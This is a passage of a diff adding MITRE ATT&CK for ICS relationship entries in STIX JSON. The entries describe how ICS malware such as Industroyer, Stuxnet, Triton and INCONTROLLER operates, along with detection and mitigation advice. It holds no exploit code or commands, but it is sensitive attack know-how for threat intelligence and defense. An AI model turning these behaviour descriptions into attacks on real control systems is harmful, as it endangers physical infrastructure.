MMSgetNameList request to determine what logical nodes the device supports. It then searches the logical nodes for the CSW value, which indicates the device performs a circuit breaker or switch control function.(Citation: ESET Industroyer)\n\n[Industroyer](https://attack.mitre.org/software/S0604)'s OPC DA module also uses IOPCBrowseServerAddressSpace to look for items with the following strings: ctlSelOn, ctlOperOn, ctlSelOff, ctlOperOff, Pos and stVal.(Citation: ESET Industroyer)\n\n[Industroyer](https://attack.mitre.org/software/S0604) IEC 60870-5-104 module includes a range mode to discover Information Object Addresses (IOAs) by enumerating through each.(Citation: ESET Industroyer)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0e275c19-7688-47f8-8cd5-85eaacec465b", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:34:04.450Z", + "description": "Monitor industrial process history data for events that correspond with command message functions, such as setpoint modification or changes to system status for key devices. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0e29f62d-4ffc-47ec-9623-72f874fbe905", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:09:52.454Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) renames s7otbxdx.dll, a dll responsible for handling communications with a PLC. It replaces this dll file with its own version that allows it to intercept any calls that are made to access the PLC. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1ed4d007-6d30-4d5d-8df9-3800ed56e042", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T18:46:37.894Z", + "description": "Analyze network data for uncommon data flows (e.g., new protocols in use between hosts, unexpected ports in use). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--79324bdd-cdab-4d0a-af60-af1047c1d117", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:25:35.287Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3be9d4d1-17e1-4f3e-b22a-edad8cf0c343", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.216Z", + "relationship_type": "mitigates", + "description": "Devices should verify that firmware has been properly signed by the vendor before allowing installation.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--25e7ca82-2784-433a-90a9-a3483615a655", + "type": "relationship", + "created": "2019-04-12T17:01:01.255Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", + "url": "https://content.fireeye.com/apt/rpt-apt38", + "source_name": "FireEye APT38 Oct 2018" + }, + { + "description": "Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.", + "url": "https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/", + "source_name": "LogRhythm WannaCry" + }, + { + "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "source_name": "FireEye WannaCry 2017" + }, + { + "source_name": "SecureWorks WannaCry Analysis", + "url": "https://www.secureworks.com/research/wcry-ransomware-analysis", + "description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019." + } + ], + "modified": "2019-09-09T19:15:45.677Z", + "description": "(Citation: FireEye APT38 Oct 2018)(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)", + "relationship_type": "uses", + "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "target_ref": "malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4966e63c-ca05-466d-91f9-41d799a54471", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T18:59:17.429Z", + "modified": "2022-05-06T17:47:24.186Z", + "relationship_type": "mitigates", + "description": "Provide privileges corresponding to the restriction of a GUI session to control system operations (examples include HMI read-only vs. read-write modes). Ensure local users, such as operators and engineers, are giving prioritization over remote sessions and have the authority to regain control over a remote session if needed. Prevent remote access sessions (e.g., RDP, VNC) from taking over local sessions, especially those used for ICS control, especially HMIs.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--18ef2d69-d11a-4d31-a803-da989c4073f7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.096Z", + "relationship_type": "mitigates", + "description": "Provide operators with redundant, out-of-band communication to support monitoring and control of the operational processes, especially when recovering from a network outage (Citation: National Institute of Standards and Technology April 2013). Out-of-band communication should utilize diverse systems and technologies to minimize common failure modes and vulnerabilities within the communications infrastructure. For example, wireless networks (e.g., 3G, 4G) can be used to provide diverse and redundant delivery of data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "external_references": [ + { + "source_name": "National Institute of Standards and Technology April 2013", + "description": "National Institute of Standards and Technology 2013, April Security and Privacy Controls for Federal Information Systems and Organizations Retrieved. 2020/09/17 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--709c4e40-c5c6-405b-bc3d-0adfea40ccd4", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:25:44.864Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) communicates with Triconex controllers using a custom component framework written entirely in Python. The modules that implement the TriStation communication protocol and other supporting components are found in a separate file -- library.zip -- the main script that employs this functionality is compiled into a standalone py2exe Windows executable -- trilog.exe which includes a Python environment. (Citation: DHS CISA February 2019)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--65adbdda-7069-40ed-9825-b79ec87e4916", + "type": "relationship", + "created": "2021-09-21T15:47:37.522Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "IBM Ransomware Trends September 2020", + "url": "https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/", + "description": "Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021." + }, + { + "source_name": "CrowdStrike Carbon Spider August 2021", + "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021." + }, + { + "source_name": "FBI Flash FIN7 USB", + "url": "https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/", + "description": "The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022." + } + ], + "modified": "2022-01-14T17:29:16.633Z", + "description": "(Citation: IBM Ransomware Trends September 2020)(Citation: CrowdStrike Carbon Spider August 2021)(Citation: FBI Flash FIN7 USB)", + "relationship_type": "uses", + "source_ref": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc", + "target_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ad7fd147-066e-4ed5-aa9d-7b2f1771150d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.111Z", + "relationship_type": "mitigates", + "description": "Web Application Firewalls may be used to limit exposure of applications to prevent exploit traffic from reaching the application. (Citation: Karen Scarfone; Paul Hoffman September 2009)\n", + "source_ref": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "external_references": [ + { + "source_name": "Karen Scarfone; Paul Hoffman September 2009", + "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 2020/09/25 ", + "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--baf7daf3-2116-4051-91b5-f82e146167d0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.235Z", + "relationship_type": "mitigates", + "description": "Routinely audit source code, application configuration files, open repositories, and public cloud storage for insecure use and storage of credentials.\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--0d4f2f88-e176-42c7-8258-52b345045662", + "created": "2022-09-28T20:29:51.844Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:17:08.493Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can remotely send commands to a malicious agent uploaded on Omron PLCs over HTTP or HTTPS.(Citation: CISA-AA22-103A) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--698d7c50-daab-4087-a7b4-b2bc8dfd81a7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T11:15:26.506Z", + "modified": "2022-05-06T17:47:24.154Z", + "relationship_type": "mitigates", + "description": "Provide the ability to verify the integrity of control logic or programs loaded on a controller. While techniques like CRCs and checksums are commonly used, they are not cryptographically strong and can be vulnerable to collisions. Preferably cryptographic hash functions (e.g., SHA-2, SHA-3) should be used. (Citation: IEC February 2019)\n", + "source_ref": "course-of-action--bcf91ebc-f316-4e19-b2f6-444e9940c697", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "external_references": [ + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8f76d408-be8a-478e-8a5a-aab1d1f96572", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:20:08.002Z", + "description": "Using OPC, a component of [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) gathers any details about connected devices and sends them back to the C2 for the attackers to analyze. (Citation: Daavid Hentunen, Antti Tikkanen June 2014)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3a6cd53d-0d4e-4cf8-8edf-f9ebde4faac4", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:23:59.758Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--fc3d0a84-e7c7-415c-ae47-42bc513e9bf9", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:55:14.825Z", + "description": "Monitor for network traffic originating from unknown/unexpected hosts. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f145b7e5-048b-46e7-8439-e2b88917523c", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:48:47.595Z", + "description": "Monitor alarms for information about when an operating mode is changed, although not all devices produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e3923fcf-5580-4c1e-bc55-33f67792cc00", + "created": "2022-09-28T20:25:51.024Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos-Pipedream", + "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite’s Emerging Malware Targeting Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + }, + { + "source_name": "Brubaker-Incontroller", + "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.448Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can wipe the memory of Omron PLCs and reset settings through the remote HTTP service.(Citation: Brubaker-Incontroller)(Citation: Dragos-Pipedream)(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1acccbe8-64e1-49ad-87df-215d5c87f050", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:42:43.105Z", + "description": "Monitor for changes made to files outside of an update or patch that may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0c1fe5fc-3bdc-4d0e-94a0-6564f2ce4444", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017", + "description": "Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov 2017, October 27 Bad Rabbit Ransomware Retrieved. 2019/10/27 ", + "url": "https://securelist.com/bad-rabbit-ransomware/82851/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:30:30.761Z", + "description": "[Bad Rabbit](https://attack.mitre.org/software/S0606) ransomware spreads through drive-by attacks where insecure websites are compromised. While the target is visiting a legitimate website, a malware dropper is being downloaded from the threat actors infrastructure. (Citation: Orkhan Mamedov, Fedor Sinitsyn, Anton Ivanov October 2017)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2fd13fc0-e3f0-4099-ab20-d19ba6bcd4e0", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:11:26.196Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) examines fields recorded by the DP_RECV monitor to determine if the target system is in a particular state of operation. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3d20dad6-fb53-4d74-bc7e-54b9b88e1529", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T18:41:15.273Z", + "description": "Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--665587ee-1524-4334-9580-2b448c417542", + "created": "2023-03-30T19:26:07.209Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 Mandiant April 2022", + "description": "Daniel Kapellmann Zafra, Raymond Leong, Chris Sistrunk, Ken Proska, Corey Hildebrandt, Keith Lunden, Nathan Brubaker. (2022, April 25). INDUSTROYER.V2: Old Malware Learns New Tricks. Retrieved March 30, 2023.", + "url": "https://www.mandiant.com/resources/blog/industroyer-v2-old-malware-new-tricks" + }, + { + "source_name": "Industroyer2 Forescout July 2022", + "description": "Forescout. (2022, July 14). Industroyer2 and INCONTROLLER In-depth Technical Analysis of the Most Recent ICS-specific Malware. Retrieved March 30, 2023.", + "url": "https://www.forescout.com/resources/industroyer2-and-incontroller-report/" + } + ], 